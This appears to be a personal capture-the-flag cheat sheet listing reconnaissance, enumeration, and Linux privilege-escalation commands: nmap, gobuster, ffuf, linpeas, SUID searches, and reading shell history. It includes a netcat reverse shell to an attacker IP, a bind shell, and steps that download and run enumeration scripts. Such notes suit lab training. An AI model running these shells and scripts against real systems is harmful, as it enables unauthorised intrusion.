CTF

ping

ping -c 10 $(target) | tee ping.txt

nmap

nmap -p- $(target)
nmap -p- -sC -sV $(target)
nmap -p- -sC -sV -Pn $(target)

enum4linux

enum4linux $(target)

sudo -l

sudo -l

cron

cat /etc/crontab
# - check scripts that are executed as root - can you edit them
# - check PATH, can you create script that will be executed instead of intended one ? 

linpeas.sh

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinEnum.sh

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

lse.sh

wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh
chmod +x lse.sh
./lse.sh

linux exploit suggester 2

wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
chmod +x linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl

python local server

python3 -m http.server

scp

scp -i id_rsa /home/kali/workspace/exploit/45010 barry@10.10.230.234:/home/barry/

python shell

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg

netcat nc shell

ATTACKER: netcat -lvnp 4444
TARGET: netcat 10.18.9.175 4444 -e /bin/bash
-- 
TARGET: netcat -lvp 4444 -e /bin/bash
ATTACKER: netcat 10.10.161.83 4444

gobuster

gobuster dir --url $(target) --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir --url $(target) --wordlist=/usr/share/wordlists/dirb/common.txt

autorecon

autorecon 10.10.99.99

SUID, SGID and Sticky Bits

find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

FFUF GET & POST

ffuf -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -X POST -d '{"key":"value"}' -u http://$(target):8081/api/FUZZ -fw 2

History

history
cat ~/.bash_history | less
cat ~/.mysql_history | less
cat ~/.nano_history | less
cat ~/.*history | less

hash

• https://gchq.github.io/CyberChef/
• https://www.guballa.de/vigenere-solver
• https://copy.sh/brainfuck/
• https://crackstation.net/
• https://hashes.com/en/decrypt/hash

notes

• joplin
• xmind.net
• cherrytree
• keepnote

Information Gathering

• https://chmod-calculator.com/
• https://gtfobins.github.io/
• https://github.com/tomnomnom/assetfinder
• https://github.com/tomnomnom/httprobe
• https://github.com/tomnomnom/waybackurls